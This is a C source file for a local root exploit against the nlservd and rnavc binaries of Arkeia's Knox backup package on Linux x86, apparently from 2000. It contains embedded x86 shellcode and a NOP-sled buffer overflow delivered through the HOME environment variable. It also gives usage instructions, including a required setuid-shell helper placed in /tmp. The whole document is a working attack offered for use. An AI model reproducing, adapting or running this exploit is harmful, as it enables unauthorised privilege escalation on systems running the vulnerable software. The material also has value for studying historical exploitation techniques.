/*
 * nlservd/rnavc local root exploit for Linux x86
 * tested on SuSE 6.2 exploits Arkiea's Knox backup package.
 *    gcc -o knox knox.c
 *    ./knox <offset> <buflen>
 *
 *
 * NOTE: you *MUST* have void main(){setuid(geteuid()); 
 *       system("/bin/bash");}
 *       compiled in /tmp/ui for this to work.
 *
 * To exploit rnavc, simply change the execl call to
 *   ("/usr/bin/knox/rnavc", "rnavc", NULL)
 *                  -Brock Tellier btellier@webley.com
 */


#include <stdlib.h>
#include <stdio.h>

char exec[]= /* Generic Linux x86 running our /tmp program */
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/tmp/ui";



#define LEN 2000
#define NOP 0x90

unsigned long get_sp(void)
{
  __asm__("movl %esp, %eax");
}


void main(int argc, char *argv[])
{

  int offset=0;
  int i;
  int buflen = LEN;
  long int addr;
  char buf[LEN];

  if(argc > 3)
    {
      fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
      exit(0);
    }
  else if (argc == 2)
    {
      offset=atoi(argv[1]);
    }
  else if (argc == 3)
    {
      offset=atoi(argv[1]);
      buflen=atoi(argv[2]);
    }
  else
    {
      offset=2800;
      buflen=1200;
    }

  addr=get_sp();

  fprintf(stderr, "Arkiea Knox backup package exploit\n");
  fprintf(stderr, "For nlservd and rnavc\n");
  fprintf(stderr, "Brock Tellier btellier@webley.com\n");
  fprintf(stderr, "Using addr: 0x%x\n", addr+offset);

  memset(buf,NOP,buflen);
  memcpy(buf+(buflen/2),exec,strlen(exec));
  for(i=((buflen/2) + strlen(exec))+3;i<buflen-4;i+=4)
    *(int *)&buf[i]=addr+offset;

  setenv("HOME", buf, 1);
  execl("/usr/knox/bin/nlservd", "nlservd", NULL);
}
/*                    www.hack.co.za              [2000]*/